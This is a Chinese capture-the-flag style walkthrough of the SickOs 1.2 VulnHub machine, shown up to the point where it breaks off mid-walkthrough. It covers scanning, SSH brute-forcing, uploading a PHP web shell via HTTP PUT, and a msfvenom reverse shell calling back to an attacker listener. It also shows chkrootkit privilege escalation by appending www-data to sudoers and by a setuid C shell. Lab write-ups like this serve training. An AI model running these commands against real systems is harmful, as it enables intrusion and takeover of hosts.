SickOs1.2靶机
仅供个人娱乐
靶机信息
靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/
一、主机发现
arp-scan -l
![](https://upload-images.jianshu.io/upload_images/4664072-87e4962320969021.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
二、端口扫描
1. masscan --rate=10000 -p0-65535 192.168.181.133
![](https://upload-images.jianshu.io/upload_images/4664072-0374b72983d251a8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
三、端口服务识别
nmap -sV -n 192.168.181.133
![](https://upload-images.jianshu.io/upload_images/4664072-66c1b775d5cf772f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
四、漏洞查找与利用
1.浏览器访问http://192.168.181.133,发现发现登录界面,尝试目录扫描,没发现有用信息
dirb http://192.168.181.133 /usr/share/dirb/wordlists/big.txt
![](https://upload-images.jianshu.io/upload_images/4664072-65a2887ffba1d813.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-941d439c41f6798d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
2.发现http://192.168.181.133/test/
![](https://upload-images.jianshu.io/upload_images/4664072-a6624f85703a0a52.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
1.SSH爆破
3.发现ssh的版本OpenSSH 5.9p1,存在用户枚举漏洞,用msf枚举用户得到用户John, root
searchsploit openssh
![](https://upload-images.jianshu.io/upload_images/4664072-93858d87dbcf155f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
search openssh
![](https://upload-images.jianshu.io/upload_images/4664072-3a9091e4e9d9189e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-0650533a59eb35a9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
4.使用hydra进行ssh爆破,破解出来root
![](https://upload-images.jianshu.io/upload_images/4664072-ca6204d09b797f4a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
5.发现web服务的版本lighttpd 1.4.28
searchsploit lighttpd,搜索漏洞,发现没有什么可利用的漏洞
![](https://upload-images.jianshu.io/upload_images/4664072-ff9b6e62a4a2bb92.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
6. nmap 192.168.181.133 --script http-methods.nse --script-args http.methods.url-path="/test"
![](https://upload-images.jianshu.io/upload_images/4664072-00203ee9be048020.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Getshell方式一 菜刀 shell
2.Bp抓包改为OPTIONS
或者对/test页面抓包,然后修改请求头为OPTIONS查看支持的HTTP方法
![](https://upload-images.jianshu.io/upload_images/4664072-77796b7a2a3bc843.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
7. 上传了一个html文件进行测试,发现真的上传成功了(上传一个不存在的文件会响应201 Created)
![](https://upload-images.jianshu.io/upload_images/4664072-4b5c003065bbe1f3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
3.Getshell方式一:菜刀
8.上传php一句话
![](https://upload-images.jianshu.io/upload_images/4664072-27731feba15fb4b4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
9. 在菜刀中上传php反弹shell,反弹连接的IP以及端口,端口设置为443(防火墙阻止了非常用端口出去)
或者使用
4.使用php-reverse-shell.php
10.将Kali上的php-reverse-shell.php复制到物理机上,重命名为1.php,并修改监听的IP地址和端口;
IP:192.168.181.128
Port:443(注:换成其他高位端口不能监听成功,防火墙过滤掉了)
![](https://upload-images.jianshu.io/upload_images/4664072-b459dae632a87e00.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-905a385494215f57.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-606a6ff0dfdd83dc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
11.查看系统版本和内核版本
![](https://upload-images.jianshu.io/upload_images/4664072-81091bb1371fb72d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Getshell方式二:msf反弹 curl上传
1.Msfvenom生成一个反弹shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=7777 -f raw > shell.php
![](https://upload-images.jianshu.io/upload_images/4664072-a1f45e28c7e84037.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
2.curl上传生成的反弹shell到目标
curl -v -H 'Expect:' -T shell.php "http://192.168.181.133/test/"
![](https://upload-images.jianshu.io/upload_images/4664072-e36d7b3e95e09398.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
3. msf开启监听
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.181.128
set lport 7777或者443
exploit -j
sudo netstat -plnt
![](https://upload-images.jianshu.io/upload_images/4664072-375552e7bdbfebb5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
4.访问上传的shell
curl -v "http://192.168.181.133/test/shell.php"
获得shell
![](https://upload-images.jianshu.io/upload_images/4664072-6d9e90ece0bc3b44.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-6e70675a166be6a6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
五、提权
lsb_relese -a
ls -la /etc/cron*
/etc/cron.daily:
![](https://upload-images.jianshu.io/upload_images/4664072-6d9651bc559a8e5a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-8cc4abfcd70430cd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
查看漏洞
![](https://upload-images.jianshu.io/upload_images/4664072-d8f578820cd76df7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-52d71e075dfea2fe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
可以看到chkrootkit存在本地提权漏洞
方法一:添加当前用户www-data到sudoers列表中
Tmp新建一个文件update
cd /tmp
touch update
ls -l
![](https://upload-images.jianshu.io/upload_images/4664072-7dd80373692c52b8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
给update文件添加执行权限
chmod +x /tmp/update
![](https://upload-images.jianshu.io/upload_images/4664072-b111d6c0fc7dd2a7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
添加当前用户www-data到sudoers列表中;
echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers' > /tmp/update
sudo su root
![](https://upload-images.jianshu.io/upload_images/4664072-cc76ccf12b793bce.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
提权方式二:漏洞库
1.exploit-database中对漏洞chkrootkit进行搜索
![](https://upload-images.jianshu.io/upload_images/4664072-f13a8165259d56cd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
2.msf中利用对应的漏洞结合已经获得的session
![](https://upload-images.jianshu.io/upload_images/4664072-2b07840d35a83c93.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
3.使用exploit/unix/local/chkrootkit模块本地提权,设置参数
![](https://upload-images.jianshu.io/upload_images/4664072-6f8dc06383755849.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
4.开始攻击,成功,获得管理员权限
![](https://upload-images.jianshu.io/upload_images/4664072-794f4d47a415cd09.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
提权方式三:创建shell.c文件
1.编写创建shell.c文件提权
在Kali上编写shell.c文件
#include<unistd.h>
void main(void)
{
system("chown root:root /tmp/update");
system("chmod 4755 /tmp/update");
setuid(0);
setgid(0);
execl("/bin/sh","sh",NULL);
}
![](https://upload-images.jianshu.io/upload_images/4664072-61f928c8a82b803c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
将shell.c文件上传到靶机上
curl -v -H "Expect:" -T shell.c http://192.168.232.136/test/
![](https://upload-images.jianshu.io/upload_images/4664072-d422baa604798958.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
cd /var/www/test
ls
cp shell.c /tmp/shell.c
cd /tmp
![](https://upload-images.jianshu.io/upload_images/4664072-8f82d6e9dd8f84f5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)